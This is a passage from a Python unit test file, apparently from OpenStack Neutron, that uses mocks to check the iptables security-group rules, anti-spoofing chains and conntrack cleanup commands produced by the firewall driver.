'ofake_dev', '-p udp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p udp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def _test_prepare_port_filter(self,
rule,
ingress_expected_call=None,
egress_expected_call=None):
port = self._fake_port()
ethertype = rule['ethertype']
prefix = utils.ip_to_cidr(FAKE_IP[ethertype])
filter_inst = self.v4filter_inst
dhcp_rule = [mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None)]
if ethertype == 'IPv6':
filter_inst = self.v6filter_inst
dhcp_rule = [mock.call.add_rule('ofake_dev',
'-s ::/128 -d ff02::/16 '
'-p ipv6-icmp -m icmp6 '
'--icmpv6-type %s -j RETURN' %
icmp6_type,
comment=None) for icmp6_type
in constants.ICMPV6_ALLOWED_UNSPEC_ADDR_TYPES]
sg = [rule]
port['security_group_rules'] = sg
self.firewall.prepare_port_filter(port)
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback',
'-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_chain('ifake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $ifake_dev',
comment=ic.SG_TO_VM_SG)
]
if ethertype == 'IPv6':
for icmp6_type in firewall.ICMPV6_ALLOWED_INGRESS_TYPES:
calls.append(
mock.call.add_rule('ifake_dev',
'-p ipv6-icmp -m icmp6 --icmpv6-type '
'%s -j RETURN' %
icmp6_type, comment=None))
calls += [
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None
)
]
if ingress_expected_call:
calls.append(ingress_expected_call)
calls += [mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule('INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s %s -m mac --mac-source FF:FF:FF:FF:FF:FF -j RETURN'
% prefix,
comment=ic.PAIR_ALLOW)]
if ethertype == 'IPv6':
calls.append(mock.call.add_rule('sfake_dev',
'-s fe80::fdff:ffff:feff:ffff/128 -m mac '
'--mac-source FF:FF:FF:FF:FF:FF -j RETURN',
comment=ic.PAIR_ALLOW))
calls.append(mock.call.add_rule('sfake_dev', '-j DROP',
comment=ic.PAIR_DROP))
calls += dhcp_rule
calls.append(mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None))
if ethertype == 'IPv4':
calls.append(mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None))
calls.append(mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None))
if ethertype == 'IPv6':
calls.append(mock.call.add_rule('ofake_dev',
'-p ipv6-icmp -m icmp6 '
'--icmpv6-type %s -j DROP' %
constants.ICMPV6_TYPE_RA,
comment=None))
calls.append(mock.call.add_rule('ofake_dev',
'-p ipv6-icmp -j RETURN',
comment=None))
calls.append(mock.call.add_rule('ofake_dev', '-p udp -m udp '
'--sport 546 --dport 547 '
'-j RETURN', comment=None))
calls.append(mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 547 --dport 546 -j DROP',
comment=None))
calls += [
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
]
if egress_expected_call:
calls.append(egress_expected_call)
calls += [mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ofake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT')]
comb = zip(calls, filter_inst.mock_calls)
for (l, r) in comb:
self.assertEqual(l, r)
filter_inst.assert_has_calls(calls)
def _test_remove_conntrack_entries(self, ethertype, protocol, direction,
ct_zone):
port = self._fake_port()
port['security_groups'] = 'fake_sg_id'
self.firewall.filtered_ports[port['device']] = port
self.firewall.updated_rule_sg_ids = set(['fake_sg_id'])
self.firewall.sg_rules['fake_sg_id'] = [
{'direction': direction, 'ethertype': ethertype,
'protocol': protocol}]
with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
{port['network_id']: ct_zone}):
self.firewall.filter_defer_apply_on()
self.firewall.sg_rules['fake_sg_id'] = []
self.firewall.filter_defer_apply_off()
if not ct_zone:
self.assertFalse(self.utils_exec.called)
return
cmd = ['conntrack', '-D']
if protocol:
cmd.extend(['-p', protocol])
if ethertype == 'IPv4':
cmd.extend(['-f', 'ipv4'])
if direction == 'ingress':
cmd.extend(['-d', '10.0.0.1'])
else:
cmd.extend(['-s', '10.0.0.1'])
else:
cmd.extend(['-f', 'ipv6'])
if direction == 'ingress':
cmd.extend(['-d', 'fe80::1'])
else:
cmd.extend(['-s', 'fe80::1'])
cmd.extend(['-w', ct_zone])
calls = [
mock.call(cmd, run_as_root=True, check_exit_code=True,
extra_ok_codes=[1])]
self.utils_exec.assert_has_calls(calls)
def test_remove_conntrack_entries_for_delete_rule_ipv4(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv4', pro, direction, ct_zone=10)
def test_remove_conntrack_entries_for_delete_rule_ipv4_no_ct_zone(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv4', pro, direction, ct_zone=None)
def test_remove_conntrack_entries_for_delete_rule_ipv6(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv6', pro, direction, ct_zone=10)
def test_remove_conntrack_entries_for_delete_rule_ipv6_no_ct_zone(self):
for direction in ['ingress', 'egress']:
for pro in [None, 'tcp', 'icmp', 'udp']:
self._test_remove_conntrack_entries(
'IPv6', pro, direction, ct_zone=None)
def test_remove_conntrack_entries_for_port_sec_group_change(self):
self._test_remove_conntrack_entries_for_port_sec_group_change(
ct_zone=10)
def test_remove_conntrack_entries_for_port_sec_group_change_no_ct_zone(
self):
self._test_remove_conntrack_entries_for_port_sec_group_change(
ct_zone=None)
def _get_expected_conntrack_calls(self, ips, ct_zone):
expected_calls = []
for ip_item in ips:
proto = ip_item[0]
ip = ip_item[1]
for direction in ['-d', '-s']:
cmd = ['conntrack', '-D', '-f', proto, direction, ip]
if ct_zone:
cmd.extend(['-w', ct_zone])
expected_calls.append(
mock.call(cmd, run_as_root=True, check_exit_code=True,
extra_ok_codes=[1]))
return expected_calls
def _test_remove_conntrack_entries_for_port_sec_group_change(self,
ct_zone):
port = self._fake_port()
port['security_groups'] = ['fake_sg_id']
self.firewall.filtered_ports[port['device']] = port
self.firewall.updated_sg_members = set(['tapfake_dev'])
with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
{port['network_id']: ct_zone}):
self.firewall.filter_defer_apply_on()
new_port = copy.deepcopy(port)
new_port['security_groups'] = ['fake_sg_id2']
self.firewall.filtered_ports[port['device']] = new_port
self.firewall.filter_defer_apply_off()
if not ct_zone:
self.assertFalse(self.utils_exec.called)
return
calls = self._get_expected_conntrack_calls(
[('ipv4', '10.0.0.1'), ('ipv6', 'fe80::1')], ct_zone)
self.utils_exec.assert_has_calls(calls)
def test_remove_conntrack_entries_for_sg_member_changed_ipv4(self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv4', direction, ct_zone=10)
def test_remove_conntrack_entries_for_sg_member_changed_ipv4_no_ct_zone(
self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv4', direction, ct_zone=None)
def test_remove_conntrack_entries_for_sg_member_changed_ipv6(self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv6', direction, ct_zone=10)
def test_remove_conntrack_entries_for_sg_member_changed_ipv6_no_ct_zone(
self):
for direction in ['ingress', 'egress']:
self._test_remove_conntrack_entries_sg_member_changed(
'IPv6', direction, ct_zone=None)
def _test_remove_conntrack_entries_sg_member_changed(self, ethertype,
direction, ct_zone):
port = self._fake_port()
port['security_groups'] = ['fake_sg_id']
port['security_group_source_groups'] = ['fake_sg_id2']
port['security_group_rules'] = [{'security_group_id': 'fake_sg_id',
'direction': direction,
'remote_group_id': 'fake_sg_id2',
'ethertype': ethertype}]
self.firewall.filtered_ports = {port['device']: port}
if ethertype == "IPv4":
ethertype = "ipv4"
members_add = {'IPv4': ['10.0.0.2', '10.0.0.3']}
members_after_delete = {'IPv4': ['10.0.0.3']}
else:
ethertype = "ipv6"
members_add = {'IPv6': ['fe80::2', 'fe80::3']}
members_after_delete = {'IPv6': ['fe80::3']}
with mock.patch.dict(self.firewall.ipconntrack._device_zone_map,
{port['network_id']: ct_zone}):
# add ['10.0.0.2', '10.0.0.3'] or ['fe80::2', 'fe80::3']
self.firewall.security_group_updated('sg_member', ['fake_sg_id2'])
self.firewall.update_security_group_members(
'fake_sg_id2', members_add)
# delete '10.0.0.2' or 'fe80::2'
self.firewall.security_group_updated('sg_member', ['fake_sg_id2'])
self.firewall.update_security_group_members(
'fake_sg_id2', members_after_delete)
# check conntrack deletion from '10.0.0.1' to '10.0.0.2' or
# from 'fe80::1' to 'fe80::2'
ips = {"ipv4": ['10.0.0.1', '10.0.0.2'],
"ipv6": ['fe80::1', 'fe80::2']}
calls = []
for direction in ['ingress', 'egress']:
direction = '-d' if direction == 'ingress' else '-s'
remote_ip_direction = '-s' if direction == '-d' else '-d'
conntrack_cmd = ['conntrack', '-D', '-f', ethertype,
direction, ips[ethertype][0]]
if not ct_zone:
continue
conntrack_cmd.extend(['-w', 10])
conntrack_cmd.extend([remote_ip_direction, ips[ethertype][1]])
calls.append(mock.call(conntrack_cmd,
run_as_root=True, check_exit_code=True,
extra_ok_codes=[1]))
self.utils_exec.assert_has_calls(calls)
def test_user_sg_rules_deduped_before_call_to_iptables_manager(self):
port = self._fake_port()
port['security_group_rules'] = [{'ethertype': 'IPv4',
'direction': 'ingress'}] * 2
self.firewall.prepare_port_filter(port)
rules = [''.join(c[1]) for c in self.v4filter_inst.add_rule.mock_calls]
self.assertEqual(len(set(rules)), len(rules))
def test_update_delete_port_filter(self):
port = self._fake_port()
port['security_group_rules'] = [{'ethertype': 'IPv4',
'direction': 'ingress'}]
self.firewall.prepare_port_filter(port)
port['security_group_rules'] = [{'ethertype': 'IPv4',
'direction': 'egress'}]
self.firewall.update_port_filter(port)
self.firewall.update_port_filter({'device': 'no-exist-device'})
self.firewall.remove_port_filter(port)
self.firewall.remove_port_filter({'device': 'no-exist-device'})
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback',
'-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_chain('ifake_dev'),
mock.call.add_rule(
'FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged -j $sg-chain',
comment=ic.VM_INT_SG),
mock.call.add_rule(
'sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged -j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule('ifake_dev', '-j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule(
'ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule(
'FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $sg-chain',
comment=ic.VM_INT_SG),
mock.call.add_rule(
'sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev', '-m state --state INVALID -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT'),
mock.call.remove_chain('ifake_dev'),
mock.call.remove_chain('ofake_dev'),
mock.call.remove_chain('sfake_dev'),
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_chain('sg-chain'),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_rule('PREROUTING', mock.ANY,
comment=None), # zone set
mock.call.add_chain('ifake_dev'),
mock.call.add_rule(
'FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged -j $sg-chain',
comment=ic.VM_INT_SG),
mock.call.add_rule(
'sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged -j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule(
'ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule(
'FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $sg-chain',
comment=ic.VM_INT_SG),
mock.call.add_rule(
'sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ofake_dev',
'-j $sg-fallback',
comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT'),
mock.call.remove_chain('ifake_dev'),
mock.call.remove_chain('ofake_dev'),
mock.call.remove_chain('sfake_dev'),
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_rule('PREROUTING', mock.ANY), # zone set
mock.call.remove_chain('sg-chain'),
mock.call.add_chain('sg-chain')]
self.v4filter_inst.assert_has_calls(calls)
def test_delete_conntrack_from_delete_port(self):
self._test_delete_conntrack_from_delete_port(ct_zone=10)
def test_delete_conntrack_from_delete_port_no_ct_zone(self):
self._test_delete_conntrack_from_delete_port(ct_zone=None)
def _test_delete_conntrack_from_delete_port(self, ct_zone):
port = self._fake_port()
port['security_groups'] = ['fake_sg_id']
self.firewall.filtered_ports = {'tapfake_dev': port}
self.firewall.devices_with_updated_sg_members['fake_sg_id2'
] = ['tapfake_dev']
new_port = copy.deepcopy(port)
new_port['security_groups'] = ['fake_sg_id2']
new_port['device'] = ['tapfake_dev2']
new_port['fixed_ips'] = ['10.0.0.2', 'fe80::2']
self.firewall.sg_members['fake_sg_id2'] = {'IPv4': ['10.0.0.2'],
'IPv6': ['fe80::2']}
mock.patch.object(self.firewall.ipconntrack, 'get_device_zone',
return_value=ct_zone).start()
self.firewall.remove_port_filter(port)
if not ct_zone:
self.assertFalse(self.utils_exec.called)
return
calls = self._get_expected_conntrack_calls(
[('ipv4', '10.0.0.1'), ('ipv6', 'fe80::1')], ct_zone)
self.utils_exec.assert_has_calls(calls)
def test_remove_unknown_port(self):
port = self._fake_port()
self.firewall.remove_port_filter(port)
# checking no exception occurs
self.assertFalse(self.v4filter_inst.called)
def test_defer_apply(self):
with self.firewall.defer_apply():
pass
self.iptables_inst.assert_has_calls([mock.call.defer_apply_on(),
mock.call.defer_apply_off()])
def test_filter_defer_with_exception(self):
try:
with self.firewall.defer_apply():
raise Exception("same exception")
except Exception:
pass
self.iptables_inst.assert_has_calls([mock.call.defer_apply_on(),
mock.call.defer_apply_off()])
def _mock_chain_applies(self):
class CopyingMock(mock.MagicMock):
"""Copies arguments so mutable arguments can be asserted on.
Copied verbatim from unittest.mock documentation.
"""
def __call__(self, *args, **kwargs):
args = copy.deepcopy(args)
kwargs = copy.deepcopy(kwargs)
return super(CopyingMock, self).__call__(*args, **kwargs)
# Need to use CopyingMock because _{setup,remove}_chains_apply are
# usually called with that's modified between calls (i.e.,
# self.firewall.filtered_ports).
chain_applies = CopyingMock()
self.firewall._setup_chains_apply = chain_applies.setup
self.firewall._remove_chains_apply = chain_applies.remove
return chain_applies
def test_mock_chain_applies(self):
chain_applies = self._mock_chain_applies()
port_prepare = {'device': 'd1', 'mac_address': 'prepare',
'network_id': 'fake_net'}
port_update = {'device': 'd1', 'mac_address': 'update',
'network_id': 'fake_net'}
self.firewall.prepare_port_filter(port_prepare)
self.firewall.update_port_filter(port_update)
self.firewall.remove_port_filter(port_update)
chain_applies.assert_has_calls([
mock.call.setup({'d1': port_prepare}, {}),
mock.call.remove({'d1': port_prepare}, {}),
mock.call.setup({'d1': port_update}, {}),
mock.call.remove({'d1': port_update}, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_need_pre_defer_copy(self):
chain_applies = self._mock_chain_applies()
port = self._fake_port()
device2port = {port['device']: port}
self.firewall.prepare_port_filter(port)
with self.firewall.defer_apply():
self.firewall.remove_port_filter(port)
chain_applies.assert_has_calls([mock.call.setup(device2port, {}),
mock.call.remove(device2port, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_coalesce_simple(self):
chain_applies = self._mock_chain_applies()
port = self._fake_port()
with self.firewall.defer_apply():
self.firewall.prepare_port_filter(port)
self.firewall.update_port_filter(port)
self.firewall.remove_port_filter(port)
chain_applies.assert_has_calls([mock.call.remove({}, {}),
mock.call.setup({}, {})])
def test_defer_chain_apply_coalesce_multiple_ports(self):
chain_applies = self._mock_chain_applies()
port1 = {'device': 'd1', 'mac_address': 'mac1', 'network_id': 'net1'}
port2 = {'device': 'd2', 'mac_address': 'mac2', 'network_id': 'net1'}
device2port = {'d1': port1, 'd2': port2}
with self.firewall.defer_apply():
self.firewall.prepare_port_filter(port1)
self.firewall.prepare_port_filter(port2)
chain_applies.assert_has_calls([mock.call.remove({}, {}),
mock.call.setup(device2port, {})])
def test_ip_spoofing_filter_with_multiple_ips(self):
port = {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': ['10.0.0.1', 'fe80::1', '10.0.0.2']}
self.firewall.prepare_port_filter(port)
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback', '-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_chain('ifake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule('INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.2/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ofake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT')]
self.v4filter_inst.assert_has_calls(calls)
def test_ip_spoofing_no_fixed_ips(self):
port = {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': []}
self.firewall.prepare_port_filter(port)
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback', '-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_chain('ifake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule('ifake_dev', '-j $sg-fallback',
comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule('INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-m mac --mac-source FF:FF:FF:FF:FF:FF -j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sg-fallback',
comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT')]
self.v4filter_inst.assert_has_calls(calls)
class IptablesFirewallEnhancedIpsetTestCase(BaseIptablesFirewallTestCase):
def setUp(self):
super(IptablesFirewallEnhancedIpsetTestCase, self).setUp()
self.firewall.ipset = mock.Mock()
self.firewall.ipset.get_name.side_effect = (
ipset_manager.IpsetManager.get_name)
self.firewall.ipset.set_name_exists.return_value = True
self.firewall.ipset.set_members = mock.Mock(return_value=([], []))
def _fake_port(self, sg_id=FAKE_SGID):
return {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': [FAKE_IP['IPv4'],
FAKE_IP['IPv6']],
'security_groups': [sg_id],
'security_group_source_groups': [sg_id]}
def _fake_sg_rule_for_ethertype(self, ethertype, remote_group):
return {'direction': 'ingress', 'remote_group_id': remote_group,
'ethertype': ethertype}
def _fake_sg_rules(self, sg_id=FAKE_SGID, remote_groups=None):
remote_groups = remote_groups or {_IPv4: [FAKE_SGID],
_IPv6: [FAKE_SGID]}
rules = []
for ip_version, remote_group_list in remote_groups.items():
for remote_group in remote_group_list:
rules.append(self._fake_sg_rule_for_ethertype(ip_version,
remote_group))
return {sg_id: rules}
